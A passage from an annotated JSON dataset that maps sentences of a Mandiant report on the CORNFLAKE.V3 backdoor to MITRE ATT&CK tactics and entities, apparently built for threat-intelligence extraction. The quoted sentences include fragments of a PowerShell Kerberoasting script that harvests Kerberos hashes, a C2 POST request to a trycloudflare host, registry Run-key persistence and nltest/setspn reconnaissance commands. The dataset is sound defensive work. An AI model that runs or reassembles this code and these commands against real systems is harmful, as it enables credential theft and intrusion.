"establishes persistence on the host", "start": 129, "end": 164, "label": "Action" }, { "text": "C2", "start": 32, "end": 34, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s90-12f658", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "This request is answered by the C2 with 2 possible responses:\nooff\n- the process exits atst - the atst function is called, which establishes persistence on the host If the response does not match one of the aforementioned 2 values, the malware interprets the response as a payload and parses the last byte of the response after XOR decrypting it.", "sentence_text": "The following values are accepted by the program:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s91-7a52bf", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 91, "context_before": "The following values are accepted by the program:", "sentence_text": "Persistence\nThe\natst\nfunction, called by main , attempts to establish persistence on the host by creating a new registry Run key named ChromeUpdater under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ], "procedure": "Establish persistence by creating a new registry Run key named ChromeUpdater under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.", "entities": [ { "text": "atst", "start": 16, "end": 20, "label": "MalwareTool" }, { "text": "creating a new registry Run key", "start": 97, "end": 128, "label": "Action" }, { "text": "ChromeUpdater", "start": 135, "end": 148, "label": "Infrastructure_Indicator" }, { "text": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "start": 155, "end": 205, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s92-db80b4", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "Persistence\nThe\natst\nfunction, called by main , attempts to establish persistence on the host by creating a new registry Run key named ChromeUpdater under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "sentence_text": "The malware uses wmic.exe to obtain the command line arguments of the currently running node.exe process.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Use wmic.exe to obtain command line arguments of the running node.exe process.", "entities": [ { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "uses wmic.exe to obtain the command line arguments", "start": 12, "end": 62, "label": "Action" }, { "text": "wmic.exe", "start": 17, "end": 25, "label": "MalwareTool" }, { "text": "node.exe process", "start": 88, "end": 104, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s93-da620e", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "The malware uses wmic.exe to obtain the command line arguments of the currently running node.exe process.", "sentence_text": "If node.exe was launched with the -e argument, like the malware does initially, the script extracts the argument after -e , which contains the full malicious script.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Malware extracts the -e command-line argument from node.exe to recover the full malicious script", "entities": [ { "text": "malware ", "start": 56, "end": 64, "label": "MalwareTool" }, { "text": "extracts the argument", "start": 91, "end": 112, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s94-84aef3", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "If node.exe was launched with the -e argument, like the malware does initially, the script extracts the argument after -e , which contains the full malicious script.", "sentence_text": "This script is written to the .log file in the Node.js installation directory and its path is saved to the path2file variable.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s95-59f2ef", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "This script is written to the .log file in the Node.js installation directory and its path is saved to the path2file variable.", "sentence_text": "If\nnode.exe\nwas instead launched with a file as an argument (such as during the persistence phase), the path to this file is extracted and saved to the path2file variable.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s96-feb774", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "If\nnode.exe\nwas instead launched with a file as an argument (such as during the persistence phase), the path to this file is extracted and saved to the path2file variable.", "sentence_text": "The\npath2file\nvariable is then set as an argument to node.exe in the newly created ChromeUpdater registry key.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s97-f9ac50", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "The\npath2file\nvariable is then set as an argument to node.exe in the newly created ChromeUpdater registry key.", "sentence_text": "This ensures that the malware executes upon user logon.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Malware is configured to execute automatically when a user logs on", "entities": [ { "text": "malware", "start": 22, "end": 29, "label": "MalwareTool" }, { "text": "executes upon user logon", "start": 30, "end": 54, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s98-07902c", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "This ensures that the malware executes upon user logon.", "sentence_text": "Executed Payloads\nAs observed in the main function, this sample can receive and execute different types of payloads from its C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Malware receives payloads from a C2 server and executes them", "entities": [ { "text": "C2 server", "start": 125, "end": 134, "label": "Infrastructure_Indicator" }, { "text": "can receive and execute different types of payloads", "start": 64, "end": 115, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s99-4e2c61", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "Executed Payloads\nAs observed in the main function, this sample can receive and execute different types of payloads from its C2 server.", "sentence_text": "This section describes two payloads that were observed in our investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s100-c2a391", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 100, "context_before": "This section describes two payloads that were observed in our investigation.", "sentence_text": "Active Directory Reconnaissance", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s101-16acd6", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "Active Directory Reconnaissance", "sentence_text": "The first payload observed on the host was a batch script containing reconnaissance commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s102-2bf530", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "The first payload observed on the host was a batch script containing reconnaissance commands.", "sentence_text": "The script initially determines if the host is domain-joined, this condition determines which specific reconnaissance type is executed.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "Determine domain status to select reconnaissance type.", "entities": [ { "text": "determines if the host is domain-joined", "start": 21, "end": 60, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s103-9395b3", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "The script initially determines if the host is domain-joined, this condition determines which specific reconnaissance type is executed.", "sentence_text": "Domain Joined\nQuery Active Directory Computer Count : Attempts to connect to Active Directory and count the total number of computer objects registered in the domain.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1018", "name": "Remote System Discovery" } ], "procedure": "Connect to Active Directory and count computer objects registered in the domain.", "entities": [ { "text": "Query Active Directory Computer Count", "start": 14, "end": 51, "label": "MalwareTool" }, { "text": "connect to Active Directory", "start": 66, "end": 93, "label": "Action" }, { "text": "count the total number of computer objects", "start": 98, "end": 140, "label": "Action" }, { "text": "Active Directory", "start": 77, "end": 93, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s104-dc1a9b", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "Domain Joined\nQuery Active Directory Computer Count : Attempts to connect to Active Directory and count the total number of computer objects registered in the domain.", "sentence_text": "Enumerate Domain Trusts : Executes nltest /domain_trusts to list all domains that the current computer's domain has trust relationships with (both incoming and outgoing).", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1482", "name": "Domain Trust Discovery" } ], "procedure": "Executes nltest /domain_trusts to enumerate trusted domains", "entities": [ { "text": "nltest", "start": 35, "end": 41, "label": "MalwareTool" }, { "text": "Enumerate Domain Trusts", "start": 0, "end": 23, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s105-2efedf", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "Enumerate Domain Trusts : Executes nltest /domain_trusts to list all domains that the current computer's domain has trust relationships with (both incoming and outgoing).", "sentence_text": "List Domain Controllers : Executes nltest /dclist :\nto find and list the available Domain Controllers (DCs) for the computer's current domain.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1018", "name": "Remote System Discovery" } ], "procedure": "Execute nltest /dclist to find and list available domain controllers for the current domain.", "entities": [ { "text": "Executes nltest /dclist", "start": 26, "end": 49, "label": "Action" }, { "text": "nltest /dclist", "start": 35, "end": 49, "label": "MalwareTool" }, { "text": "find and list the available Domain Controllers", "start": 55, "end": 101, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s106-3b09b3", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "List Domain Controllers : Executes nltest /dclist : to find and list the available Domain Controllers (DCs) for the computer's current domain.", "sentence_text": "Query Service Principal Names (SPNs) : Executes setspn -T -Q */* to query for all SPNs registered in the user's logon domain, then filters the results (Select-String) to specifically highlight SPNs potentially associated with user accounts (lines starting CN=...Users).", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "Query SPNs to identify user-linked service accounts.", "entities": [ { "text": "setspn -T -Q */*", "start": 48, "end": 77, "label": "Action" }, { "text": "Service Principal Names (SPNs)", "start": 6, "end": 36, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s107-6141fd", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "Query Service Principal Names (SPNs)...", "sentence_text": "Not Domain Joined Enumerate Local Groups : Uses Get-LocalGroup to list all security groups defined locally on the machine.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1069.001", "name": "Local Group Discovery" } ], "procedure": "Enumerate local security groups on host.", "entities": [ { "text": "Get-LocalGroup", "start": 48, "end": 62, "label": "Action" }, { "text": "security groups", "start": 75, "end": 90, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s108-fbf7b3", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "Not Domain Joined Enumerate Local Groups : Uses Get-LocalGroup to list all security groups defined locally on the machine.", "sentence_text": "Kerberoasting\nThe second script executed is a batch script which attempts to harvest credentials via Kerberoasting.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Steal or Forge Kerberos Tickets: Kerberoasting" } ], "procedure": "Execute a batch script that attempts to harvest credentials using Kerberoasting.", "entities": [ { "text": "batch script", "start": 46, "end": 58, "label": "MalwareTool" }, { "text": "attempts to harvest credentials via Kerberoasting", "start": 65, "end": 114, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s109-4b0ded", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "Kerberoasting\nThe second script executed is a batch script which attempts to harvest credentials via Kerberoasting.", "sentence_text": "The script queries Active Directory for user accounts configured with SPNs (often an indication of a service account using user credentials).", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1558.003", "name": "Steal or Forge Kerberos Tickets: Kerberoasting" }, { "id": "T1087.002", "name": "Account Discovery: Domain Account" } ], "procedure": "Query Active Directory for user accounts configured with SPNs.", "entities": [ { "text": "script", "start": 4, "end": 10, "label": "MalwareTool" }, { "text": "queries Active Directory", "start": 11, "end": 35, "label": "Action" }, { "text": "Active Directory", "start": 19, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "user accounts configured with SPNs", "start": 40, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s110-20fde4", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "The script queries Active Directory for user accounts configured with SPNs (often an indication of a service account using user credentials).", "sentence_text": "For each of these, it requests a Kerberos service ticket from which a password hash is extracted and formatted.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1558.003", "name": "Steal or Forge Kerberos Tickets: Kerberoasting" } ], "procedure": "Request Kerberos service tickets and extract password hashes from them.", "entities": [ { "text": "requests a Kerberos service ticket", "start": 22, "end": 56, "label": "Action" }, { "text": "Kerberos service ticket", "start": 33, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "password hash", "start": 70, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "is extracted and formatted", "start": 84, "end": 110, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s111-32de1e", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "For each of these, it requests a Kerberos service ticket from which a password hash is extracted and formatted.", "sentence_text": "These hashes are exfiltrated to the C2 server, where the attacker can attempt to crack them.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1110.002", "name": "Brute Force: Password Cracking" } ], "procedure": "Exfiltrate hashes to the C2 server and attempt to crack them.", "entities": [ { "text": "hashes", "start": 6, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "are exfiltrated to the C2 server", "start": 13, "end": 45, "label": "Action" }, { "text": "C2 server", "start": 36, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "attacker", "start": 57, "end": 65, "label": "ThreatActor" }, { "text": "attempt to crack them", "start": 70, "end": 91, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s112-5fb5fb", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "These hashes are exfiltrated to the C2 server, where the attacker can attempt to crack them.", "sentence_text": "$a = 'System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s113-c3dbc7", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "$a = 'System.", "sentence_text": "IdentityModel';\n$b = [Reflection.Assembly]::LoadWithPartialName($a);\n$c = New - Object DirectoryServices.DirectorySearcher([ADSI]'');\n$c.filter = '(&(servicePrincipalName=*)(objectCategory=user))';\n$d = $c.Findall();\nforeach($e in $d) { $f = $e.GetDirectoryEntry();\n$g = $f.samAccountName;\nif ($g - ne 'krbtgt')", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s114-21ff18", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "IdentityModel';\n$b = [Reflection.Assembly]::LoadWithPartialName($a);\n$c = New - Object DirectoryServices.DirectorySearcher([ADSI]'');\n$c.filter = '(&(servicePrincipalName=*)(objectCategory=user))';\n$d = $c.Findall();\nforeach($e in $d) { $f = $e.GetDirectoryEntry();\n$g = $f.samAccountName;\nif ($g - ne 'krbtgt')", "sentence_text": "{ Start - Sleep - Seconds (Get - Random - Minimum 1 - Maximum 11);\nforeach($h in $f.servicePrincipalName) { $i = $null;\ntry {\n$i = New - Object System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s115-171741", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "{ Start - Sleep - Seconds (Get - Random - Minimum 1 - Maximum 11);\nforeach($h in $f.servicePrincipalName) { $i = $null;\ntry {\n$i = New - Object System.", "sentence_text": "IdentityModel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s116-f899e8", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "IdentityModel.", "sentence_text": "Tokens.KerberosRequestorSecurityToken - ArgumentList $h;\n} catch {} if ($i - ne $null) { $j = $i.GetRequest();\nif ($j) { $k = [System.BitConverter]::ToString($j) - replace'-';", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s119-bb1421", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "Collections.", "sentence_text": "ArrayList]$l =\n($k - replace'^(.*?)04820...(.*)', '$2') - Split'A48201';\n$l.RemoveAt($l.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s120-c0dc1a", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "ArrayList]$l =\n($k - replace'^(.*?)04820...(.*)', '$2') - Split'A48201';\n$l.RemoveAt($l.", "sentence_text": "Count - 1);\n$m = $l - join'A48201';\ntry {\n$m = $m.Insert(32, '$');\n$n = '$krb5tgs$23$*' + $g + '/' + $h + '*$' + $m;\nWrite - Host $n;\nbreak;\n} catch {}}}}}} PHP Variant", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s121-4ba936", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "Count - 1);\n$m = $l - join'A48201';\ntry {\n$m = $m.Insert(32, '$');\n$n = '$krb5tgs$23$*' + $g + '/' + $h + '*$' + $m;\nWrite - Host $n;\nbreak;\n} catch {}}}}}} PHP Variant", "sentence_text": "This version was dropped by an in-memory script which was executed as a result of interaction with a malicious ClickFix lure page.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Drop a version via an in-memory script executed after interaction with a malicious ClickFix lure page.", "entities": [ { "text": "in-memory script", "start": 31, "end": 47, "label": "MalwareTool" }, { "text": "was dropped", "start": 13, "end": 24, "label": "Action" }, { "text": "was executed", "start": 54, "end": 66, "label": "Action" }, { "text": "malicious ClickFix lure page", "start": 101, "end": 129, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s122-01ddf1", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "This version was dropped by an in-memory script which was executed as a result of interaction with a malicious ClickFix lure page.", "sentence_text": "The script downloads the PHP package from windows.php[.]net , writes it to disk as php.zip and extracts its contents to the C:\\Users\\\\AppData\\Roaming\\php\\ directory", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Download a PHP package, write it to disk as php.zip, and extract it to a user directory.", "entities": [ { "text": "script", "start": 4, "end": 10, "label": "MalwareTool" }, { "text": "downloads the PHP package", "start": 11, "end": 36, "label": "Action" }, { "text": "windows.php[.]net", "start": 42, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "writes it to disk", "start": 62, "end": 79, "label": "Action" }, { "text": "php.zip", "start": 83, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "extracts its contents", "start": 95, "end": 116, "label": "Action" }, { "text": "C:\\Users\\\\AppData\\Roaming\\php\\", "start": 124, "end": 160, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s123-f31998", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "The script downloads the PHP package from windows.php[.]net...", "sentence_text": "The CORNFLAKE.V3 PHP sample is contained in the config.cfg file that was also dropped in the same directory and executed with the following command line arguments: \"C:\\\\Users\\\\AppData\\Roaming\\php\\php.exe\" -d extension=zip -d extension_dir=ext C:\\Users\\\\AppData\\Roaming\\php\\config.cfg 1 To maintain persistence on the host, this variant utilizes a registry Run key named after a randomly chosen directory in %APPDATA% or %LOCALAPPDATA% instead of the fixed ChromeUpdater string used in the Node.js version.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Execute PHP payload and create registry Run key for persistence.", "entities": [ { "text": "CORNFLAKE.V3", "start": 4, "end": 16, "label": "MalwareTool" }, { "text": "executed with the following command line arguments", "start": 112, "end": 162, "label": "Action" }, { "text": "registry Run key", "start": 359, "end": 375, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s124-f60528", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "The CORNFLAKE.V3 PHP sample is contained in the config.cfg file that was also dropped in the same directory and executed with the following command line arguments:\n\"C:\\\\Users\\\\AppData\\Roaming\\php\\php.exe\" -d extension=zip -d extension_dir=ext C:\\Users\\\\AppData\\Roaming\\php\\config.cfg 1 To maintain persistence on the host, this variant utilizes a registry Run key named after a randomly chosen directory in %APPDATA% or %LOCALAPPDATA% instead of the fixed ChromeUpdater string used in the Node.js version.", "sentence_text": "To communicate with its C2 a unique path is generated for each request, unlike the static /init1234 path:\nPOST /ue/2&290cd148ed2f4995f099b7370437509b/fTqvlt HTTP/1.1 Host: varying-rentals-calgary-predict.trycloudflare[.]com Connection: close Content-Length: 39185 Content-type: application/octet-stream Much like the Node.js version, the last byte of the received payload determines the payload type, however, these values differ in the PHP version:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Malware communicates with its C2 by generating a unique URL path for each HTTP POST request", "entities": [ { "text": "varying-rentals-calgary-predict.trycloudflare[.]com", "start": 172, "end": 223, "label": "Infrastructure_Indicator" }, { "text": "To communicate with its C2", "start": 0, "end": 26, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s125-695979", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "To communicate with its C2 a unique path is generated for each request, unlike the static /init1234 path:\nPOST /ue/2&290cd148ed2f4995f099b7370437509b/fTqvlt HTTP/1.1 Host: varying-rentals-calgary-predict.trycloudflare[.]com Connection: close Content-Length: 39185 Content-type: application/octet-stream Much like the Node.js version, the last byte of the received payload determines the payload type, however, these values differ in the PHP version:", "sentence_text": "The Javascript payload execution functionality was retained by implementing the download of the Node.js runtime environment inside the JS command.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s126-2033fe", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "The Javascript payload execution functionality was retained by implementing the download of the Node.js runtime environment inside the JS command.", "sentence_text": "Other notable changes include the change of the DLL and JS payload file extensions into .png", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s127-c6bba9", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "Other notable changes include the change of the DLL and JS payload file extensions into .png", "sentence_text": "and .jpg to evade detection and the addition of the ACTIVE and AUTORUN commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s128-e28d5a", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "and .jpg to evade detection and the addition of the ACTIVE and AUTORUN commands.", "sentence_text": "However, the main functionality of the backdoor remains unchanged despite the transition from Node.js to PHP.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s129-180408", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "However, the main functionality of the backdoor remains unchanged despite the transition from Node.js to PHP.", "sentence_text": "These changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s130-4b81e9", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "These changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.", "sentence_text": "Executed Payloads\nActive Directory Reconnaissance cmd.exe reconnaissance payload similar to the one encountered in the Node.js variant was received from the C2 server and executed.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "Receive a reconnaissance payload from the C2 server and execute it using cmd.exe.", "entities": [ { "text": "cmd.exe", "start": 50, "end": 57, "label": "MalwareTool" }, { "text": "was received from the C2 server", "start": 135, "end": 166, "label": "Action" }, { "text": "C2 server", "start": 157, "end": 166, "label": "Infrastructure_Indicator" }, { "text": "executed", "start": 171, "end": 179, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s131-61697c", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "Executed Payloads\nActive Directory Reconnaissance cmd.exe reconnaissance payload similar to the one encountered in the Node.js variant was received from the C2 server and executed.", "sentence_text": "The script checks if the machine is part of an Active Directory domain and collects the following information using powershell:\nDomain Joined\nTotal count of computer accounts in AD.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1482", "name": "Domain Trust Discovery" } ], "procedure": "Check whether the machine is part of an Active Directory domain and collect domain-related computer account information using PowerShell.", "entities": [ { "text": "script", "start": 4, "end": 10, "label": "MalwareTool" }, { "text": "checks if the machine is part of an Active Directory domain", "start": 11, "end": 70, "label": "Action" }, { "text": "Active Directory", "start": 47, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "collects the following information using powershell", "start": 75, "end": 126, "label": "Action" }, { "text": "powershell", "start": 116, "end": 126, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s132-b07cb9", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 132, "context_before": "The script checks if the machine is part of an Active Directory domain and collects the following information using powershell:\nDomain Joined\nTotal count of computer accounts in AD.", "sentence_text": "Domain trust relationships.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s133-d25f7f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 133, "context_before": "Domain trust relationships.", "sentence_text": "List of all Domain Controllers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s134-bd4be8", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 134, "context_before": "List of all Domain Controllers.", "sentence_text": "Members of the \"Domain Admins\" group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s135-1ffbbb", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 135, "context_before": "Members of the \"Domain Admins\" group.", "sentence_text": "User accounts configured with a Service Principal Name (SPN).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s136-44243a", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 136, "context_before": "User accounts configured with a Service Principal Name (SPN).", "sentence_text": "All local groups and their members Current User name, SID, local group memberships and security privileges Not Domain Joined All local groups and their members Current User name, SID, local group memberships and security privileges WINDYTWIST.SEA Backdoor Following the interaction with its C2 server, a DLL payload (corresponding to command ) was received, written to disk as C:\\Users\\\\AppData\\Roaming\\Shift194340\\78G0ZrQi.png and executed using rundll32 .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1218.011", "name": "System Binary Proxy Execution: Rundll32" } ], "procedure": "Receive a DLL payload from the C2 server, write it to disk, and execute it using rundll32.", "entities": [ { "text": "WINDYTWIST.SEA Backdoor", "start": 232, "end": 255, "label": "MalwareTool" }, { "text": "C2 server", "start": 291, "end": 300, "label": "Infrastructure_Indicator" }, { "text": "DLL payload", "start": 304, "end": 315, "label": "MalwareTool" }, { "text": "was received", "start": 344, "end": 356, "label": 